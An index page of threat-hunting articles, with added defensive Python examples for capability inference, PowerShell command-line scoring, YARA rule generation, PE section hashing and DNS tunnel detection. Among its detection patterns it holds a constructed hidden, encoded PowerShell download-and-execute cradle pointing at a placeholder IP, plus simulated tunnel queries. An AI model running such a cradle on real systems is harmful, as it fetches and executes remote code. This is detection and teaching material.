Threat Hunting Articles (23)

Introduction to Malware Endpoint hunting

In this article we concentrate on locating malware on endpoints.

Malware hunting: Detection tools

Malware will not disappear anytime soon. To remain undetected for as long as possible, malware authors employ a variety of tools and methods, so defenders likewise need a variety of tools and techniques to locate it.

Hunting Webshells: Tools

In this article we discuss tools that can be used to discover web shells.

Hunting Webshells: Linux and Windows Commands

Analyzing web server logs (Apache, IIS, etc.) is one technique for hunting web shells, but this article does not devote much time to log analysis; it concentrates on the Linux and Windows commands used to find web shells on the host itself.

Intro to Hunting Webshells

A web shell is a script uploaded to a web server that gives an attacker remote control of the machine. Both internal and Internet-facing web servers can be infected, and the web shell is then used to pivot to internal hosts.

Suspicious Traffic Hunting

In this article we discuss how to establish what normal network traffic looks like when analyzing packets, so that suspicious traffic stands out.

Fundamental threat hunting concepts and examples

Adversary behavioral identification is about predicting attacks: identifying the typical tactics and techniques an adversary uses to attack a target network. This helps security teams build a more secure network infrastructure and adopt the security measures needed to prevent those attacks.

Analyzing malicious code without reverse engineering the assembly

When evaluating malicious code, threat hunters have various tools to aid their investigation. One way to understand the behavior of a suspicious file is to disassemble it, but not everyone has the time or ability to learn assembly well enough to work out what a binary does. By looking up the Windows functions a binary references on the Microsoft technical documentation site, a threat hunter can infer the malware's capabilities and make a more informed decision about the behavior of a suspicious file.
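The approach described above, as an example added here (not code from the original article): pull the printable strings out of a binary the way the `strings` utility does, keep the tokens that look like Windows API names, fold the A/W variants onto the single function the documentation describes, and map them to the capabilities they usually indicate. The capability grouping is this example's own assumption, not a Microsoft taxonomy, and each function should still be confirmed on learn.microsoft.com; the sample byte string stands in for a binary's import table and is constructed for the demonstration.

```python
import re

# Windows API names grouped by the capability they usually indicate. This
# grouping is the example's own (an assumption, not a Microsoft taxonomy).
# Names are stored without the A/W suffix because both variants share one
# documentation page.
CAPABILITY_MAP = {
    "process injection": {"VirtualAllocEx", "WriteProcessMemory", "CreateRemoteThread",
                          "NtMapViewOfSection", "QueueUserAPC", "SetThreadContext"},
    "network / download": {"InternetOpen", "InternetOpenUrl", "InternetReadFile",
                           "URLDownloadToFile", "WSAStartup", "WinHttpOpen"},
    "persistence (registry)": {"RegCreateKeyEx", "RegSetValueEx", "RegOpenKeyEx"},
    "anti-analysis": {"IsDebuggerPresent", "CheckRemoteDebuggerPresent",
                      "NtQueryInformationProcess", "OutputDebugString"},
    "privilege / token": {"OpenProcessToken", "AdjustTokenPrivileges", "LookupPrivilegeValue"},
    "keylogging": {"SetWindowsHookEx", "GetAsyncKeyState", "GetForegroundWindow"},
}


def extract_strings(data: bytes, min_len: int = 4) -> list:
    """Printable ASCII runs, the same thing the `strings` utility prints."""
    return [m.group().decode("ascii")
            for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data)]


def normalize(name: str) -> str:
    """CreateFileA and CreateFileW document the same function, CreateFile."""
    if len(name) > 4 and name[-1] in "AW" and name[-2].islower():
        return name[:-1]
    return name


def infer_capabilities(data: bytes) -> dict:
    """Map API names seen in the binary's strings to capability labels."""
    seen = {normalize(tok) for s in extract_strings(data)
            for tok in re.findall(r"[A-Za-z][A-Za-z0-9]{3,40}", s)}
    return {cap: sorted(seen & apis) for cap, apis in CAPABILITY_MAP.items() if seen & apis}


def assessment(data: bytes) -> str:
    """Turn the capability set into the one-line call a hunter writes up."""
    caps = infer_capabilities(data)
    if not caps:
        return "no recognised API names; the sample may be packed, try unpacking or dynamic analysis"
    detail = "; ".join(f"{k}: {', '.join(v)}" for k, v in caps.items())
    if "process injection" in caps and "network / download" in caps:
        return "downloader with injection capability: " + detail
    return detail


# Constructed stand-in for a binary's import names (not a real sample).
SAMPLE_IMPORTS = (
    b"\x00\x00kernel32.dll\x00VirtualAllocEx\x00WriteProcessMemory\x00"
    b"CreateRemoteThread\x00IsDebuggerPresent\x00\x00wininet.dll\x00"
    b"InternetOpenA\x00InternetOpenUrlA\x00InternetReadFile\x00\xff\xfe"
)

if __name__ == "__main__":
    print(assessment(SAMPLE_IMPORTS))
```

An empty result is itself a finding: a Windows executable with no recognisable API names is usually packed, which is why the assessment suggests unpacking or a sandbox run rather than declaring the file clean.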

What is fileless malware?

Fileless malware is malware that does not rely on a traditional executable file written to disk to infect a system. Instead, it abuses tools and resources already present on the system to carry out its malicious activity, typically using scripting languages such as PowerShell or VBScript to execute malicious code. The code runs directly in memory, evading traditional security solutions that focus on scanning files on disk.
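Because nothing is written to disk, hunting for fileless malware means inspecting what the interpreter was asked to run: process command lines and, where PowerShell script block logging is enabled, the logged script text. The example below, added here and not taken from the original article, decodes the UTF-16LE base64 that `-EncodedCommand` carries and scores the command line for in-memory tradecraft (download cradles, Invoke-Expression, reflective assembly loads, hidden launches). The indicator list and weights are this example's own choices, the command lines are constructed samples rather than real telemetry, and `encode_for_powershell` exists only to build the encoded sample.

```python
import base64
import re

# powershell.exe accepts any unambiguous prefix of -EncodedCommand; the
# common forms are -e, -ec, -enc and the full name.
ENCODED_FLAG = re.compile(r"-e(?:c|nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)

# (weight, pattern): indicators of in-memory execution. Weights are this
# example's own choice; the launch flags alone are weak, so they score 1.
INDICATORS = {
    "invoke-expression": (2, re.compile(r"\b(?:iex|invoke-expression)\b", re.I)),
    "download cradle": (2, re.compile(r"downloadstring|downloadfile|invoke-webrequest|net\.webclient", re.I)),
    "reflective assembly load": (2, re.compile(r"\[(?:system\.)?reflection\.assembly\]::load", re.I)),
    "base64 payload in memory": (2, re.compile(r"frombase64string", re.I)),
    "win32 api via add-type": (2, re.compile(r"add-type.*?(?:virtualalloc|createthread|dllimport)", re.I | re.S)),
    "amsi tampering": (2, re.compile(r"amsiutils|amsiinitfailed", re.I)),
    "hidden / no-profile launch": (1, re.compile(r"-(?:w(?:indowstyle)?\s+hidden|nop(?:rofile)?|noni(?:nteractive)?)\b", re.I)),
}


def encode_for_powershell(script: str) -> str:
    """Build the UTF-16LE base64 form -EncodedCommand expects (used only to construct the sample)."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the decoded script if the command line carries -EncodedCommand, else None."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_command_line(cmdline: str, threshold: int = 3) -> dict:
    """Score one process command line (or a logged script block); the decoded
    payload is scanned together with the visible arguments."""
    decoded = decode_encoded_command(cmdline)
    text = cmdline + "\n" + (decoded or "")
    hits = [name for name, (_, rx) in INDICATORS.items() if rx.search(text)]
    score = sum(INDICATORS[h][0] for h in hits)
    return {"cmdline": cmdline, "decoded": decoded, "indicators": hits,
            "score": score, "suspicious": score >= threshold}


def hunt(cmdlines) -> list:
    """Return only the command lines that cross the threshold."""
    return [r for r in (analyze_command_line(c) for c in cmdlines) if r["suspicious"]]


# Constructed sample command lines (not real telemetry); 203.0.113.0/24 is a
# documentation address range.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a.ps1')"
SAMPLE_CMDLINES = [
    'powershell.exe -NoProfile -Command "Get-Service | Where-Object Status -eq Running"',
    "powershell.exe -nop -w hidden -e " + encode_for_powershell(CRADLE),
    'powershell -nop -w hidden -c "[Reflection.Assembly]::Load([Convert]::FromBase64String($b))"',
]

if __name__ == "__main__":
    for r in hunt(SAMPLE_CMDLINES):
        print(r["score"], r["indicators"], r["decoded"] or r["cmdline"])
```

Feed it the command-line field from process creation events (Sysmon event 1 or Windows 4688 with command-line auditing) or the text of event 4104; the first sample shows why the launch flags alone must not alert, since administrators run `-NoProfile` constantly.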

Using YARA for Threat Hunting in Enterprise Environments

YARA is a powerful tool that lets forensic and malware analysts search within artifacts discovered during an investigation. It allows fine-grained searches based on byte patterns at specific offsets within an executable, timestamps, specific strings, and dozens of other criteria. Previous articles have discussed YARA and demonstrated some of its capabilities (see Introduction to YARA Rules - Part 1 and Part 2). Threat hunters also use YARA to search for indicators of compromise (IOCs) that support their hypothesis, taking the IOCs from threat intelligence reports, malware analysis reports, or their own knowledge of a specific malware family.
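The hunting use described above starts from a list of IOCs in a report; turning them into a rule by hand is error-prone (backslashes in paths, odd-length hex, identifiers that begin with a digit). The generator below is an example added here, not code from the original article or from the YARA project: it emits a rule with text strings, hex byte patterns, an optional PE check on the first two bytes, and whole-file SHA-256 matches via the `hash` module. The rule name, IOC values and SHA-256 (the digest of empty input, used as a placeholder) are constructed for the demonstration; the `hash.sha256(0, filesize)` and `uint16(0) == 0x5A4D` forms are standard YARA syntax.

```python
import re


def _escape(s: str) -> str:
    """YARA text strings use C-style escapes for backslash and double quote."""
    return s.replace("\\", "\\\\").replace('"', '\\"')


def _ident(name: str) -> str:
    """YARA identifiers: letters, digits and underscore, not starting with a digit."""
    clean = re.sub(r"[^A-Za-z0-9_]", "_", name)
    return "_" + clean if clean[:1].isdigit() else clean


def build_yara_rule(name, text_iocs=(), hex_iocs=(), sha256_hashes=(),
                    min_strings=2, pe_only=False, meta=None) -> str:
    """Emit a YARA rule from IOC lists pulled out of a report."""
    for h in sha256_hashes:
        if not re.fullmatch(r"[0-9a-fA-F]{64}", h):
            raise ValueError(f"not a SHA-256 hex digest: {h}")
    for h in hex_iocs:
        if not re.fullmatch(r"(?:[0-9a-fA-F]{2})+", h):
            raise ValueError(f"hex IOC must be whole bytes: {h}")
    if not (text_iocs or hex_iocs or sha256_hashes):
        raise ValueError("no IOCs supplied")

    out = []
    if sha256_hashes:
        out += ['import "hash"', ""]          # hash module is needed for file digests
    out += [f"rule {_ident(name)}", "{"]
    if meta:                                 # an empty meta: section is a syntax error
        out.append("    meta:")
        for k, v in meta.items():
            out.append(f'        {_ident(k)} = "{_escape(str(v))}"')
    if text_iocs or hex_iocs:                # likewise an empty strings: section
        out.append("    strings:")
        for i, s in enumerate(text_iocs, 1):
            out.append(f'        $s{i} = "{_escape(s)}" ascii wide nocase')
        for i, h in enumerate(hex_iocs, 1):
            spaced = " ".join(h[j:j + 2] for j in range(0, len(h), 2)).upper()
            out.append(f"        $h{i} = {{ {spaced} }}")
    terms = []
    if text_iocs:
        terms.append(f"{min(min_strings, len(text_iocs))} of ($s*)")
    if hex_iocs:
        terms.append("any of ($h*)")
    for h in sha256_hashes:
        terms.append(f'hash.sha256(0, filesize) == "{h.lower()}"')
    condition = " or ".join(terms)
    if pe_only:                              # MZ at offset 0: restrict to PE files
        condition = f"uint16(0) == 0x5A4D and ({condition})"
    out += ["    condition:", f"        {condition}", "}"]
    return "\n".join(out)


# Constructed IOCs for the demo; the SHA-256 is the digest of empty input,
# used here only as a placeholder value.
SAMPLE_RULE = build_yara_rule(
    "Report_2024_Loader_IOCs",
    text_iocs=["evil.example.com", "C:\\Users\\Public\\svchost.exe"],
    hex_iocs=["4d5a90000300"],
    sha256_hashes=["e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"],
    pe_only=True,
    meta={"author": "hunt team", "source": "constructed example, not a real report"},
)

if __name__ == "__main__":
    print(SAMPLE_RULE)
```

Write the output to a `.yar` file and run `yara -r rules.yar /path/to/scan`. Requiring two of the text strings (`min_strings=2`) rather than one keeps a single hostname that also appears in a benign configuration file from matching on its own.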

Detecting exfiltration over network protocols

Data exfiltration (exfil) is the transfer of data out of the organization without authorization. It can be done in a number of ways, including using protocols in unintended ways to hide data inside otherwise legitimate traffic. By understanding how each protocol works and what data belongs in each field, a threat hunter can better identify threat actors who are trying to steal, or have already stolen, sensitive information.

Fuzzy Hashing, Import Hashing and Section Hashing

In the last post we looked at a variety of methods for tracking and recognizing malware samples, including cryptographic hashes, fuzzy hashes, and writing YARA rules. However, threat actors constantly change their samples and signatures, making it difficult for us to recognize their tools and tactics.
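Section hashing is the one of the three techniques in the title that can be shown end to end without third-party libraries, so the example below, added here rather than taken from the original post, implements it: it walks the DOS header to `e_lfanew`, checks the PE signature, reads the section count and optional-header size from the COFF header, and hashes each section's raw bytes. Two constructed "variants" share the same `.text` bytes but carry different embedded configuration, so their whole-file hashes differ while the `.text` hash matches. Computing imphash (import table) or ssdeep (fuzzy) hashes in practice needs the `pefile` and `ssdeep` packages, which this example does not use; `build_minimal_pe` produces a toy file that is parseable but not loadable, and the placeholder x86 bytes are arbitrary.

```python
import hashlib
import struct

SECTION_HDR = struct.Struct("<8sIIIIIIHHI")   # IMAGE_SECTION_HEADER, 40 bytes
COFF_HDR = struct.Struct("<HHIIIHH")          # IMAGE_FILE_HEADER, 20 bytes


def parse_sections(pe: bytes) -> list:
    """DOS header -> e_lfanew -> PE signature -> COFF header -> section table."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    coff_off = e_lfanew + 4
    _, n_sections, _, _, _, opt_size, _ = COFF_HDR.unpack_from(pe, coff_off)
    table_off = coff_off + COFF_HDR.size + opt_size
    sections = []
    for i in range(n_sections):
        (name, _vsize, _vaddr, raw_size, raw_ptr,
         _, _, _, _, _chars) = SECTION_HDR.unpack_from(pe, table_off + i * SECTION_HDR.size)
        raw = pe[raw_ptr:raw_ptr + raw_size]
        sections.append({
            "name": name.rstrip(b"\x00").decode("ascii", "replace"),
            "raw": raw,
            # Section table pointing past EOF is common in damaged or crafted files;
            # record it rather than silently hashing the short read.
            "truncated": len(raw) < raw_size,
        })
    return sections


def section_hashes(pe: bytes) -> dict:
    """SHA-256 of each section's raw bytes, keyed by section name."""
    return {s["name"]: hashlib.sha256(s["raw"]).hexdigest() for s in parse_sections(pe)}


def shared_sections(a: bytes, b: bytes) -> list:
    """Section names whose raw bytes are identical in both files."""
    ha, hb = section_hashes(a), section_hashes(b)
    return sorted(n for n in ha if n in hb and ha[n] == hb[n])


def build_minimal_pe(sections: dict) -> bytes:
    """Constructed toy PE for the demo: DOS header, PE signature, COFF header with
    no optional header, then the section table and raw section data."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\x00" * (0x3C - 2) + struct.pack("<I", e_lfanew)   # exactly 0x40 bytes
    coff = COFF_HDR.pack(0x14C, len(sections), 0, 0, 0, 0, 0x0102)    # i386, executable
    raw_ptr = e_lfanew + 4 + COFF_HDR.size + SECTION_HDR.size * len(sections)
    table, body = b"", b""
    for name, data in sections.items():
        table += SECTION_HDR.pack(name.encode("ascii").ljust(8, b"\x00"),
                                  len(data), 0x1000, len(data), raw_ptr,
                                  0, 0, 0, 0, 0x60000020)              # code|execute|read
        body += data
        raw_ptr += len(data)
    return dos + b"PE\x00\x00" + coff + table + body


# Two constructed variants: same code section, different embedded C2 config
# (addresses are from documentation ranges). The x86 bytes are placeholders.
CODE = bytes.fromhex("5589e583ec10c745fc00000000") + b"\x90" * 32
SAMPLE_A = build_minimal_pe({".text": CODE, ".data": b"c2=203.0.113.5\x00"})
SAMPLE_B = build_minimal_pe({".text": CODE, ".data": b"c2=198.51.100.7\x00"})

if __name__ == "__main__":
    print("whole-file hashes equal:", SAMPLE_A == SAMPLE_B)
    print("sections shared:", shared_sections(SAMPLE_A, SAMPLE_B))
```

A rebuilt sample with a new C2 address defeats a whole-file hash but not the `.text` hash, which is the property section hashing is for; a `truncated` flag is worth surfacing on its own, since a section table that points past the end of the file is a sign of a crafted or corrupted binary.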

Introduction to YARA Rules - Part 2

Let’s continue our acquaintance with YARA rules!

Introduction to YARA Rules - Part 1

A lot of research has been done over the years to improve detection, and researchers have come up with many novel detection methods and methodologies. Each has its own advantages and disadvantages, so no single one can be chosen over all the others: some are better suited to one task than to another. For that reason, many businesses implement a hybrid solution.

Hunting in distributed organizations

Threat hunting in a distributed organization presents some unique challenges: gathering data from all applicable devices, having access to every device relevant to the hunt being performed, and, where applicable, performing hunts specific to the remote site.

4 Approaches to threat hunt

Threat hunting is the proactive search for malicious activity on a company's networks. It is a crucial part of an organization's security, and more companies are starting to invest in it. Its goal is to find threats before they cause damage, which requires specific methodologies. Threat hunting is time-consuming, but it is critical for any firm that wants to stay ahead of the cybersecurity curve.

Hunting with Threat Emulation

Organizations are under constant attack from sophisticated cyber adversaries. To defend against them, security teams must employ threat hunting techniques to identify and neutralize these threats. One such technique is threat emulation: replicating an adversary's behavior to understand their methods better, detect that behavior, and develop mitigating controls that block their attacks.

Email: Another source for data exfiltration

When data exfiltration occurs, the threat hunt may begin by examining public web servers, databases, and file servers. Those are obvious first choices because they are accessible from the internet and from within the organization. Knowing the type of data exfiltrated, and where that data is stored, can help generate a hypothesis for beginning the hunt, provided the organization knows where all of its data is located. Another service to check, though, is email.

Generating a threat hunting hypothesis

Threat hunting can be a daunting task. It can be difficult to know where to start or what tools to use. One way to make the process easier is to generate a hypothesis before beginning the hunt. This focuses the hunt on specific areas and makes sure you are looking for the right things.

The business case for threat hunting for small businesses

Threat hunting may seem like a process that only large organizations need. Small businesses may feel they are not a target of cyberattacks, so convincing them to invest in routine threat hunting may be difficult. According to the Small Business Administration, “88% of small business owners felt their business was vulnerable to a cyber-attack”. Hiscox insurance found that for micro firms of fewer than ten employees, “the median cost of all attacks this year [2021] was just over $8,000. But at the 95th percentile and beyond there were firms suffering losses of $308,000. Some encountered still worse outcomes. One German business services firm experienced breaches costing the equivalent of $474,000 per employee.” They also found that some firms were attacked multiple times within a single year. Despite these statistics, small business owners continue to operate with the false sense of security that their business is too small to be a target.

Using DNS for Threat Hunting

DNS is a service that can provide valuable information on whether an organization has been compromised. For it to aid threat hunting, the resolver must be configured to log each query together with the IP address of the host that made it. Once logging is enabled, a number of questions can be asked that a SIEM or a script can answer.
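The script route mentioned above, as an example added here (not code from the original DNS article, and also serving the "Detecting exfiltration over network protocols" entry, since DNS is the protocol most often bent into carrying data out in the query name). Given a query log that records client, query type, name and response code, it asks three questions: which hosts send labels that look encoded, which host-and-domain pairs burn through many unique subdomains (a tunnel has to vary the name to carry new data), and which hosts pile up NXDOMAIN answers (DGA-style lookups), plus a cheap "domains only one host ever asked for" pivot. The log format, thresholds, the naive two-label registered-domain rule (production code should use the Public Suffix List) and the sample log are all this example's own assumptions and constructions.

```python
import hashlib
import math
import re
from collections import Counter, defaultdict

# Constructed log format (an assumption; adapt LOG_RE to your resolver):
#   <timestamp> <client-ip> <qtype> <qname> <rcode>
LOG_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<client>\d+\.\d+\.\d+\.\d+)\s+"
                    r"(?P<qtype>[A-Z]+)\s+(?P<qname>\S+)\s+(?P<rcode>\w+)$")


def parse_dns_log(lines) -> list:
    records = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if m:
            rec = m.groupdict()
            rec["qname"] = rec["qname"].rstrip(".").lower()
            records.append(rec)
    return records


def registered_domain(qname: str) -> str:
    """Naive: last two labels. Production code should consult the Public Suffix List."""
    parts = qname.split(".")
    return ".".join(parts[-2:]) if len(parts) >= 2 else qname


def entropy(s: str) -> float:
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def hunt_dns(records, max_label=30, max_unique_subs=10, max_nxdomain=5) -> list:
    """Encoded-looking labels, subdomain churn per (client, domain), NXDOMAIN bursts."""
    findings = []
    unique_subs = defaultdict(set)
    nxdomain = Counter()
    for r in records:
        dom = registered_domain(r["qname"])
        prefix = r["qname"][:-len(dom)].rstrip(".") if r["qname"] != dom else ""
        if prefix:
            unique_subs[(r["client"], dom)].add(prefix)
            longest = max(len(label) for label in prefix.split("."))
            flat = prefix.replace(".", "")
            # Hex/base32 chunks are long and near-uniform; short hostnames are neither.
            if longest > max_label or (len(flat) >= 20 and entropy(flat) > 3.5):
                findings.append({"client": r["client"], "domain": dom,
                                 "reason": "encoded-looking label", "qname": r["qname"]})
        if r["rcode"] == "NXDOMAIN":
            nxdomain[r["client"]] += 1
    for (client, dom), names in unique_subs.items():
        if len(names) > max_unique_subs:
            findings.append({"client": client, "domain": dom,
                             "reason": "many unique subdomains", "count": len(names)})
    for client, n in nxdomain.items():
        if n > max_nxdomain:
            findings.append({"client": client, "domain": None,
                             "reason": "NXDOMAIN burst", "count": n})
    return findings


def single_client_domains(records) -> list:
    """Domains only one host ever asked for: a cheap rare-domain pivot."""
    clients = defaultdict(set)
    for r in records:
        clients[registered_domain(r["qname"])].add(r["client"])
    return sorted(d for d, c in clients.items() if len(c) == 1)


def build_sample_log() -> list:
    """Constructed query log: normal browsing, a DNS tunnel, and a DGA-style host."""
    lines = [
        "2024-05-01T10:00:01Z 10.0.0.5 A www.example.com NOERROR",
        "2024-05-01T10:00:02Z 10.0.0.5 A mail.example.com NOERROR",
        "2024-05-01T10:00:03Z 10.0.0.6 A www.example.com NOERROR",
        "2024-05-01T10:00:04Z 10.0.0.6 AAAA cdn-static-assets.example.org NOERROR",
    ]
    for i in range(12):   # tunnel: each query carries a chunk of data in the label
        chunk = hashlib.sha1(str(i).encode()).hexdigest()
        lines.append(f"2024-05-01T10:01:{i:02d}Z 10.0.0.9 TXT {chunk}.t.exfil.example.net NOERROR")
    for name in ("kjhdsqa", "plqmzrt", "xcvbnwe", "qazwsxe", "rfvtgby", "yhnujmi"):
        lines.append(f"2024-05-01T10:02:00Z 10.0.0.7 A {name}.com NXDOMAIN")
    return lines


if __name__ == "__main__":
    recs = parse_dns_log(build_sample_log())
    for f in hunt_dns(recs):
        print(f)
    print("single-client domains:", single_client_domains(recs))
```

The thresholds need tuning per environment: CDNs and some antivirus products legitimately generate long, high-entropy labels (TXT lookups of hashes in particular), so the first pass should be run over a day of real logs to learn which domains to allowlist before any of these reasons is promoted to an alert.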

Understanding the Threat Hunting Process Step-by-Step

Threat hunting is the process of detecting and responding to cyber intrusions that network and endpoint security controls have missed. It is also a proactive approach to security that helps organizations identify and mitigate risks before they result in an incident. The stages of threat hunting vary depending on the source you read, though five general stages can be gleaned from the existing literature.

Becoming a Threat Hunter

A rare diamond is on display at a local museum for a few weeks. An effective security system is in place to ensure the diamond does not get stolen: alarms, cameras, and trained staff. Despite the security system, the staff remain vigilant for theft attempts, which includes studying the behaviour of visitors who come to see the diamond.